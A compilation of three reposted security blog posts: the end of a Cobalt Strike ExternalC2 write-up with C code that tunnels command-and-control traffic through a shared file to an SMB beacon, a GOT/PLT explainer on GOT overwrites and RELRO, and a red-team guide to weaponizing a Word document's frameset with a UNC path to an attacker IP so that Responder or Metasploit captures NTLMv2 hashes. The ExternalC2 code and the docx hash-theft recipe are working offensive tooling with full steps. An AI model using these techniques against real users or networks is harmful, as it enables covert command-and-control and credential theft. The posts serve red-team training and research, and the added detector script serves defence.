Let’s think about just how this will look. Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third-Party Controller.

Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon.

I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITE options are provided.
This will allow both sides of the Third-Party Client to read and write to the file simultaneously:

    HANDLE openC2FileServer(const char *filepath) {
        HANDLE handle;
        handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (handle == INVALID_HANDLE_VALUE)
            printf("Error opening file: %x\n", GetLastError());
        return handle;
    }

Next, we need a way to serialise our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example:

    struct file_c2_header {
        DWORD id;
        DWORD len;
    };

The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this:

    void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) {
        char *fileBytes = NULL;
        DWORD bytesWritten = 0;
        fileBytes = (char *)malloc(8 + len);
        if (fileBytes == NULL)
            return;
        // Add our file header
        *(DWORD *)fileBytes = id;
        *(DWORD *)(fileBytes+4) = len;
        memcpy(fileBytes + 8, data, len);
        // Make sure we are at the beginning of the file
        SetFilePointer(c2File, 0, 0, FILE_BEGIN);
        // Write our C2 data in
        WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL);
        printf("[*] Wrote %d bytes\n", bytesWritten);
        // Release the temporary buffer once it has been written out
        free(fileBytes);
    }

    char *readC2File(HANDLE c2File, DWORD *len, int expect) {
        char header[8];
        DWORD bytesRead = 0;
        char *fileBytes = NULL;
        memset(header, 0xFF, sizeof(header));
        // Poll until we have our expected id in the header
        while (*(DWORD *)header != expect) {
            SetFilePointer(c2File, 0, 0, FILE_BEGIN);
            ReadFile(c2File, header, 8, &bytesRead, NULL);
            Sleep(100);
        }
        // Read out the expected length from the header
        *len = *(DWORD *)(header + 4);
        fileBytes = (char *)malloc(*len);
        if (fileBytes == NULL)
            return NULL;
        // Finally, read out our C2 data
        ReadFile(c2File, fileBytes, *len, &bytesRead, NULL);
        printf("[*] Read %d bytes\n", bytesRead);
        return fileBytes;
    }

Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here.

If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2.

Source: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
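The id/len file header from the ExternalC2 write-up above can also be sketched in Python, which makes the byte layout easy to check. This is a minimal illustration under stated assumptions, not the author's code: the function names are hypothetical, a temporary file stands in for the file share, and the reader makes a single non-blocking attempt, where the C version polls in a loop with Sleep(100).

```python
import os
import struct
import tempfile

# Two little-endian DWORDs, mirroring struct file_c2_header { id; len; }
HEADER = struct.Struct("<II")

def write_c2_file(path, data, owner_id):
    """Write header + data at offset 0, like SetFilePointer + WriteFile."""
    with open(path, "r+b") as f:
        f.seek(0)
        f.write(HEADER.pack(owner_id, len(data)) + data)

def try_read_c2_file(path, expect_id):
    """Return the body if the header id matches expect_id, else None."""
    with open(path, "rb") as f:
        header = f.read(HEADER.size)
        if len(header) < HEADER.size:
            return None  # nothing written yet
        owner_id, length = HEADER.unpack(header)
        if owner_id != expect_id:
            return None  # not our turn to read
        body = f.read(length)
        return body if len(body) == length else None

def demo():
    """Write a message addressed to id 1, then read it as id 2 and as id 1."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        write_c2_file(path, b"task for beacon", owner_id=1)
        return try_read_c2_file(path, 2), try_read_c2_file(path, 1)
    finally:
        os.remove(path)
```

A caller that wants the blocking behaviour of readC2File can wrap try_read_c2_file in a loop with a short sleep until it returns something other than None.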
  24. GOT and PLT for pwning. 19 Mar 2017 in Security Tags: Pwning, Linux So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others). All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.) High-Level Introduction So what is all of this nonsense about? Well, there’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy: Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update. 
Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible. Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. Relocations Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice. .got This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols. .plt This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.) .got.plt This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section. .plt.got It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.) 
TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses.

Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions: puts and exit and show the state of the various sections as we go along. Here’s our source:

    // Build with: gcc -m32 -no-pie -g -o plt plt.c
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char **argv) {
        puts("Hello world!");
        exit(0);
    }

Let’s examine the section headers:

    There are 36 section headers, starting at offset 0x1fb4:

    Section Headers:
      [Nr] Name      Type      Addr     Off    Size   ES Flg Lk Inf Al
      [12] .plt      PROGBITS  080482f0 0002f0 000040 04  AX  0   0 16
      [13] .plt.got  PROGBITS  08048330 000330 000008 00  AX  0   0  8
      [14] .text     PROGBITS  08048340 000340 0001a2 00  AX  0   0 16
      [23] .got      PROGBITS  08049ffc 000ffc 000004 04  WA  0   0  4
      [24] .got.plt  PROGBITS  0804a000 001000 000018 04  WA  0   0  4

I’ve left only the sections I’ll be talking about, the full program is 36 sections!

So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.)
We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step:

    pwndbg> disass main
    Dump of assembler code for function main:
       0x0804843b <+0>:     lea    ecx,[esp+0x4]
       0x0804843f <+4>:     and    esp,0xfffffff0
       0x08048442 <+7>:     push   DWORD PTR [ecx-0x4]
       0x08048445 <+10>:    push   ebp
       0x08048446 <+11>:    mov    ebp,esp
       0x08048448 <+13>:    push   ebx
       0x08048449 <+14>:    push   ecx
       0x0804844a <+15>:    call   0x8048370 <__x86.get_pc_thunk.bx>
       0x0804844f <+20>:    add    ebx,0x1bb1
       0x08048455 <+26>:    sub    esp,0xc
       0x08048458 <+29>:    lea    eax,[ebx-0x1b00]
       0x0804845e <+35>:    push   eax
       0x0804845f <+36>:    call   0x8048300 <puts@plt>
       0x08048464 <+41>:    add    esp,0x10
       0x08048467 <+44>:    sub    esp,0xc
       0x0804846a <+47>:    push   0x0
       0x0804846c <+49>:    call   0x8048310 <exit@plt>
    End of assembler dump.
    pwndbg> break *0x0804845f
    Breakpoint 1 at 0x804845f: file plt.c, line 7.
    pwndbg> r
    Breakpoint *0x0804845f
    pwndbg> x/i $pc
    => 0x804845f <main+36>: call   0x8048300 <puts@plt>

Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .plt section, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function.

    pwndbg> si
    pwndbg> x/i $pc
    => 0x8048300 <puts@plt>:        jmp    DWORD PTR ds:0x804a00c

We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to resulting address.

Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above.

    pwndbg> x/wx 0x804a00c
    0x804a00c:      0x08048306
    pwndbg> si
    0x08048306 in puts@plt ()
    pwndbg> x/2i $pc
    => 0x8048306 <puts@plt+6>:      push   0x0
       0x804830b <puts@plt+11>:     jmp    0x80482f0

Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred?
Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then jumps to the routine that looks up the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out.

    pwndbg> si
    pwndbg> si
    pwndbg> x/2i $pc
    => 0x80482f0:   push   DWORD PTR ds:0x804a004
       0x80482f6:   jmp    DWORD PTR ds:0x804a008

Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on.

    pwndbg> x/2wx 0x804a004
    0x804a004:      0xf7ffd918      0xf7fedf40

Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the 2nd into the executable area:

    0xf7fd9000 0xf7ffb000 r-xp    22000 0      /lib/i386-linux-gnu/ld-2.24.so
    0xf7ffc000 0xf7ffd000 r--p     1000 22000  /lib/i386-linux-gnu/ld-2.24.so
    0xf7ffd000 0xf7ffe000 rw-p     1000 23000  /lib/i386-linux-gnu/ld-2.24.so

Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary.

So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol.

    pwndbg> x/i $pc
    => 0xf7fedf5b:  ret    0xc
    pwndbg> ni
    pwndbg> info symbol $pc
    puts in section .text of /lib/i386-linux-gnu/libc.so.6

Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point:

    pwndbg> x/4wx $esp
    0xffffcc2c:     0x08048464      0x08048500      0xffffccf4      0xffffccfc
    pwndbg> x/s *(int *)($esp+4)
    0x8048500:      "Hello world!"

Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts.
Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first:

    pwndbg> disass 'puts@plt'
    Dump of assembler code for function puts@plt:
       0x08048300 <+0>:     jmp    DWORD PTR ds:0x804a00c
       0x08048306 <+6>:     push   0x0
       0x0804830b <+11>:    jmp    0x80482f0
    End of assembler dump.
    pwndbg> x/wx 0x804a00c
    0x804a00c:      0xf7e4b870
    pwndbg> info symbol 0xf7e4b870
    puts in section .text of /lib/i386-linux-gnu/libc.so.6

So now, a call puts@plt results in an immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.)

How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT.

Pwning Relocations

Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with:

    Section Headers:
      [Nr] Name      Type      Addr     Off    Size   ES Flg Lk Inf Al
      [12] .plt      PROGBITS  080482f0 0002f0 000040 04  AX  0   0 16
      [13] .plt.got  PROGBITS  08048330 000330 000008 00  AX  0   0  8
      [14] .text     PROGBITS  08048340 000340 0001a2 00  AX  0   0 16
      [23] .got      PROGBITS  08049ffc 000ffc 000004 04  WA  0   0  4
      [24] .got.plt  PROGBITS  0804a000 001000 000018 04  WA  0   0  4
    Key to Flags:
      W (write), A (alloc), X (execute), M (merge), S (strings), I (info),

We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled.
So we won’t be overwriting any executable sections, but we should be used to that.

On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry.

Mitigations

So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO.

Partial RELRO (enabled with -Wl,-z,relro):
- Maps the .got section as read-only (but not .got.plt).
- Rearranges sections to reduce the likelihood of global variables overflowing into control structures.

Full RELRO (enabled with -Wl,-z,relro,-z,now):
- Does the steps of Partial RELRO, plus:
- Causes the linker to resolve all symbols at load time (before starting execution) and then remove write permissions from .got.
- .got.plt is merged into .got with full RELRO, so you won’t see this section name.

Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable.

Summary

The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT.
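To tie the pieces together, here is a toy Python model of the behaviour described above: lazy binding through a table of function pointers, a GOT overwrite, and full RELRO making the table read-only. It is purely conceptual; the ToyProcess class and its methods are hypothetical names, and nothing here touches real ELF structures or ld.so.

```python
class ToyProcess:
    """Toy model of PLT/GOT dispatch; the GOT is a dict of callables."""

    def __init__(self, library, bind_now=False):
        self.library = library
        self.resolver_calls = 0
        self.got_writable = True
        # Lazy binding: every slot starts out pointing at a resolver stub.
        self.got = {name: self._lazy_stub(name) for name in library}
        if bind_now:
            # Full RELRO: resolve everything up front, then drop write access.
            for name in library:
                self.got[name] = library[name]
            self.got_writable = False

    def _lazy_stub(self, name):
        def stub(*args):
            # Plays the role of ld.so: patch the slot, then run the function.
            self.resolver_calls += 1
            self.got[name] = self.library[name]
            return self.library[name](*args)
        return stub

    def call(self, name, *args):
        # name@plt: an indirect jump through the GOT slot.
        return self.got[name](*args)

    def overwrite_got(self, name, target):
        # Stands in for an attacker's arbitrary-write primitive.
        if not self.got_writable:
            raise PermissionError("GOT is read-only (full RELRO)")
        self.got[name] = target


def demo():
    library = {"puts": lambda s: "puts(%r)" % s}
    lazy = ToyProcess(library)
    first = lazy.call("puts", "hi")    # goes through the resolver stub
    second = lazy.call("puts", "hi")   # slot already patched, direct call
    lazy.overwrite_got("puts", lambda s: "hijacked(%r)" % s)
    third = lazy.call("puts", "hi")    # control flow redirected
    hardened = ToyProcess(library, bind_now=True)
    try:
        hardened.overwrite_got("puts", print)
        blocked = False
    except PermissionError:
        blocked = True
    return first, second, lazy.resolver_calls, third, blocked
```

The resolver counter staying at 1 after two calls mirrors the second look at 0x804a00c in the GDB session, where the slot already holds the libc address.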
References

ELF Format Reference
Examining Dynamic Linking with GDB
RELRO - A (not so well known) Memory Corruption Mitigation Technique
What is the symbol and the global offset table?
How the ELF ruined Christmas

Source: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
  25. Microsoft Office – NTLM Hashes via Frameset

December 18, 2017

Microsoft Office documents play a vital role in red team assessments, as they are usually used to gain an initial foothold on the client’s internal network. Staying under the radar is a key element as well, and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft Office.

Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combine this with Responder in order to capture NTLM hashes externally.

Word documents with the docx extension are actually zip files which contain various XML documents. These XML files control the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files:

Figure: Docx Contents

The word folder contains a file called webSettings.xml. This file needs to be modified in order to include the frameset.

Figure: webSettings File

Adding the following code will create a link with another file.

    <w:frameset>
      <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
      </w:framesetSplitbar>
      <w:frameset>
        <w:frame>
          <w:name w:val="3"/>
          <w:sourceFileName r:id="rId1"/>
          <w:linkedToFile/>
        </w:frame>
      </w:frameset>
    </w:frameset>

Figure: webSettings XML – Frameset

The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten.

Figure: webSettings with Frameset – Adding new version to archive

A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1), the UNC path, and the TargetMode, which states whether the target is external or internal.
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/>
    </Relationships>

Figure: webSettings XML Relationship File – Contents

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

Figure: webSettings XML rels

Now that the Word document has been weaponized to connect to a UNC path over the Internet, Responder can be configured in order to capture the NTLM hashes.

    responder -I wlan0 -e 192.168.1.169 -b -A -v

Figure: Responder Configuration

Once the target user opens the Word document, it will try to connect to a UNC path.

Figure: Word – Connect to UNC Path via Frameset

Responder will retrieve the NTLMv2 hash of the user.

Figure: Responder – NTLMv2 Hash via Frameset

Alternatively, Metasploit Framework can be used instead of Responder in order to capture the password hash.

    auxiliary/server/capture/smb

Figure: Metasploit – SMB Capture Module

NTLMv2 hashes will be captured in Metasploit upon opening the document.

Figure: Metasploit SMB Capture Module – NTLMv2 Hash via Frameset

Conclusion

This technique can allow the red team to grab domain password hashes from users, which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally, if the target user is an elevated account such as local administrator or domain admin, then this method can be combined with SMB relay in order to obtain a Meterpreter session.

Source: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
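Because a docx is just a zip of XML parts, the frameset relationship described above is easy to look for from the defensive side. The Python sketch below is one hedged way to do that with the standard library: it opens the archive, reads the webSettings relationship part, and lists external frame targets. The function names are hypothetical, and the part path `word/_rels/webSettings.xml.rels` is an assumption based on the usual package layout of the _rels directory inside the word folder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Assumed location of the relationship part inside the docx archive.
RELS_PATH = "word/_rels/webSettings.xml.rels"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
FRAME_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
              "relationships/frame")

def external_frame_targets(docx):
    """Return Target values of external frame relationships in a docx.

    docx may be a filesystem path or a binary file-like object.
    """
    with zipfile.ZipFile(docx) as archive:
        if RELS_PATH not in archive.namelist():
            return []
        root = ET.fromstring(archive.read(RELS_PATH))
    targets = []
    for rel in root.iter(PKG_NS + "Relationship"):
        if rel.get("Type") == FRAME_TYPE and rel.get("TargetMode") == "External":
            targets.append(rel.get("Target"))
    return targets

def build_sample():
    """Build a tiny in-memory archive holding only the relationship part."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/'
            'package/2006/relationships">'
            '<Relationship Id="rId1" Type="' + FRAME_TYPE + '" '
            'Target="\\\\192.0.2.10\\share\\doc.docx" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(RELS_PATH, rels)
    buf.seek(0)
    return buf
```

A non-empty result whose target starts with two backslashes is the pattern this post describes; the sample archive is only a test fixture and is not a valid Word document.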